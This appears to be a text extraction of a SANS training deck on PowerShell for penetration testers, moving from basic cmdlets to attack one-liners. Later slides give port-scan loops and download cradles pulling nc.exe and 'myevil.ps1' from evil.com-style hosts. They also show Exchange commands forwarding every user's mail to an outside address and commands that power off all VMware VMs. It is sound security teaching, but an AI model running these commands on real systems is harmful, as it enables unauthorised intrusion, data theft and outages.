TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" )...
Transcript of TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" )...
![Page 1: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/1.jpg)
Tim Medin
![Page 2: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/2.jpg)
Counter Hack Challenges Background
Pen Tester – Internal, Perimeter, Web, Social, Telephony
Corp Security – Financial Services
Network Engineer – Higher Education
Software Engineer – Manufacturing & Industrial
Control Systems Engineer
Contributions Laudanum CommandLineKungFu.com Packetstan.com Other blogs
Local DefCon and Security Groups
CCDC Local Universities
![Page 3: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/3.jpg)
Coolness of PowerShell Basics of PowerShell Quick Command Line Attacks Script Execution 3rd Party CmdLets
![Page 4: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/4.jpg)
CMD is teh sUck!!1! Need upgrade, badly Nothing is standard
Naming Switches Switch operators
dash v. slash
Why would you want to parse anything? Are you too good for the For Loop!
![Page 5: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/5.jpg)
Installed by default on Windows 7, Server 2008R2, and later
Full integration with Microsoft Server Products Exchange SharePoint Active Directory
Third Party Apps too VMware!
Full access to .NET Framework
In short, FUN!
![Page 6: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/6.jpg)
Basics of PowerShell
![Page 7: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/7.jpg)
“CmdLets” are quite standard PowerShell Naming Convention
Names are Verb-‐Noun Verbs Standardized by Microsoft ▪ Get vs. Read ▪ Find vs. Search
Common Parameter Names Help
![Page 8: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/8.jpg)
We don’t have to parse text! Easily string together many commands Easier to read $_.Length vs cut -d' ' –f4
Don’t have to know what the 4th item in the output is, as with Cut or AWK
![Page 9: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/9.jpg)
Just like other shells, but… Objects!
Find files containing “blah” Get-ChildItem | Select-String blah –list
Find files containing “blah”…and delete them Get-ChildItem | Select-String blah –list | Remove-Item
![Page 10: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/10.jpg)
Prefixed with $ Dot access properties and methods of an object
![Page 11: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/11.jpg)
$_ Current Pipeline Object Used in script blocks, filters (Where-‐Object), ForEach-‐Object, and switches
$true $false $null See them all with: Get-ChildItem variable:
![Page 12: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/12.jpg)
PowerShell PowerShell Alias CMD *nix
Get-‐ChildItem ls, gci, dir dir ls
Copy-‐Item cp, copy, cpi copy cp
Move-‐Item move, mv, mi move mv
Select-‐String <none> find, findstr grep
Get-‐Help man, help help man
Get-‐Content cat, gc, type type cat
Easy! Aliases match CMD and Bash
![Page 13: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/13.jpg)
ForEach-‐Object (alias %) Operates on each object passed down the pipeline, Not to be confused with ForEach, a looping statement
Get-ChildItem | ForEach-Object { "do something with " + $_.Name}
ls | % { "do something with " + $_.Name }
Where-‐Object (alias ?) Used to filter objects passed down the pipeline
Get-Process | ? { $_.Modules -like "*(rsaenh.dll)*" -and $_.Modules -like "*(iphlpapi.dll)*"
-and $_.Modules -like "*(WININET.dll)*" }
![Page 14: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/14.jpg)
Out-‐* Output to file, Host, Printer, …
Export-‐CSV Exports object, with names and properties Import-‐CSV can read it back in
Group-‐Object Groups objects together based on properties
Sort-‐Object
![Page 15: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/15.jpg)
Get-‐Member (alias gm) Gets all the properties and methods of an object type
Available properties and Methods on Files ls | gm
Format-‐List (alias fl) Output the properties of all the object passed down the pipeline, only “default” properties
Use * to see all the properties ls | fl *
![Page 16: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/16.jpg)
Gets a list of commands (DUH!) With no parameters it lists everything
-‐Noun <string> -‐Verb <string> -‐Module <string> All cmdlets in a module (e.g. Exchange, VMware, etc.)
Very useful for finding the cmdlet you need!
![Page 17: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/17.jpg)
Can use it on aliases too (e.g. ls, mv) Default output is isn’t really useful Useful switches
-‐Examples (-‐ex for short) -‐Full
![Page 18: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/18.jpg)
Aliases Parameters
Need as much of the name as necessary to uniquely identify it. ✗ ls -‐f “f” matches Filter & Force ✔ ls -‐fo “fo” only matches Force ✔ ls -‐for “for” only matches Force
![Page 19: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/19.jpg)
Works for CmdLets AND PARAMETERS! Allows you to cycle though matching names
You complete me!
![Page 20: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/20.jpg)
![Page 21: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/21.jpg)
PS C:\> 1..1024 | % { echo ((new-object Net.Sockets.TcpClient) .Connect("10.1.1.14",$_)) "$_ is open" } 2>$null
25 is open
![Page 22: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/22.jpg)
Pseudo Code 1..1024 | foreach-object { print (connection_attempt “port is open”) } Discard error message
The trick PS C:\> echo (1+1) (2+2) 2 4
PS C:\> echo (1/0) (2+2) Attempt to divide by zero <-‐ 2+2 is not output
![Page 23: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/23.jpg)
PS C:\> 1..255 | % { echo ((new-object Net.Sockets.TcpClient) .Connect("10.1.1.$_",445)) "10.1.1.$_" } 2>$null
10.1.1.5
![Page 24: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/24.jpg)
Access text file like this (to stdout):
(New-Object System.Net.WebClient) .DownloadString("http://mysite.com/myevil.ps1")
To save it a file:
… | Out-File –Encoding ASCII myfile.ps1
![Page 25: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/25.jpg)
What if we want to download an executable?
(New-Object System.Net.WebClient) .DownloadFile( "http://mysite.com/nc.exe", "c:\nc.exe" )
…but, we can’t PowerShell with netcat
![Page 26: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/26.jpg)
Wants a Terminal From Meterpreter, go BOOM What about a script?
![Page 27: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/27.jpg)
Default Execution Policy stop scripts Default mode is “Restricted” Change it to allow local, unsigned scripts with Set-ExecutionPolicy RemoteSigned ▪ Changing requires Admin Permissions
BUT…
![Page 28: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/28.jpg)
Get-Help about_Execution_Policies
The execution policy is not a security system that restricts user actions. For example, users can easily circumvent a policy by typing the script contents at the command line when they cannot run a script. Instead, the execution policy helps users to set basic rules and prevents them from violating them unintentionally.
![Page 29: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/29.jpg)
C:\temp> powershell -command ls powershell -command ls
Directory: C:\temp
Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 3/22/2012 5:10 PM 14 file2 -a--- 3/22/2012 5:10 PM 12 file3
![Page 30: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/30.jpg)
C:\> powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://evil.com/nc.exe', 'nc.exe’)"
![Page 31: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/31.jpg)
C:\temp> powershell -command ls powershell -command ls
Directory: C:\temp
Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 3/22/2012 5:10 PM 14 file2 -a--- 3/22/2012 5:10 PM 12 file3 -a--- 3/23/2012 12:10 PM 61440 nc.exe
![Page 32: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/32.jpg)
Run a script without running a script Uses Encoded Command DefCon 18 Talk by Dave Kennedy (ReL3K) and Josh Kelley (Winfang)
Windump Dump SAM via PowerShell, but has problems
![Page 33: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/33.jpg)
Interface to VMware vSphere Extremely Powerful! Commands Connect-VIServer vc1 –User tm –Password pw
Get-VM
Get-VM | Stop-VM –Confirm:$false <-‐ Power off Everything
DON’T RUN THIS!
![Page 34: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/34.jpg)
I want data…data is on the servers…so get the whole server?
$ds = Get-Datastore <datastore-name>
New-PSDrive -Name MyDS -PSProvider ViMdatastore -Root '\' -location $ds
Copy-DatastoreItem MyDS:\Fldr2\ -Destination C:\temp
![Page 35: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/35.jpg)
Firewall-‐Shmirewall! Runs a PowerShell script IN the guest OS of each of the specified virtual machines
It does require credentials to access the Guest We can probably get those when we download the VM
![Page 36: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/36.jpg)
Why yes, I’d like all your email
Set-Mailbox joeuser -DeliverToMailboxAndForward:$True -ForwardingAddress [email protected]
![Page 37: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/37.jpg)
Why yes, I’d like EVERYONE’S email
Get-Mailbox | Set-Mailbox -DeliverToMailboxAndForward:$True -ForwardingAddress [email protected]
![Page 38: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/38.jpg)
Requires Domain Admin Permissions Providers
Microsoft -‐ Requires one of the following ▪ Windows 2008 R2 Domain Controller ▪ Windows 2008 R2 Server running Lightweight Directory Services
Quest – client only (better for pen testing) List all users in a pretty CSV Get-ADUser | Export-CSV us.csv <-‐MS Get-QADUser | Export-CSV us.csv <-‐Quest
![Page 39: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/39.jpg)
All users without password expirations Get-QADUser -Enabled -PasswordNeverExpires:$true
![Page 40: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/40.jpg)
PowerShell is a significant upgrade from CMD We can use the same CMD Fu, but it’s easier (albeit more verbose)
Lot’s of interaction with other products
![Page 41: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/41.jpg)
@timmedin
SEC 560: Network Penetration Testing Ethical Hacking – Dallas, June 18 – 23
SEC 504: Hacker Techniques, Exploits and Incident Handling – Raleigh, July 16 – 21
![Page 42: TimMedin - SANS Information Security Training · PDF file" quot;, "c:\nc.exe" ) but,wecan’t PowerShellwith netcat$ ... Hacking–Dallas,$June18–23](https://reader033.fdocuments.us/reader033/viewer/2022051010/5ab2b0b97f8b9ac66c8d957e/html5/thumbnails/42.jpg)
Brute for VMware creds http://blog.securitywhole.com/2009/09/01/brute-‐force-‐esx-‐usernamepassword.aspx
PowerShell, it’s time to own http://www.secmaniac.com/files/PowerShell_Defcon.pdf
Command Line Kung Fu Blog http://www.commandlinekungfu.com
Hey! Scripting Guy! http://blogs.technet.com/b/heyscriptingguy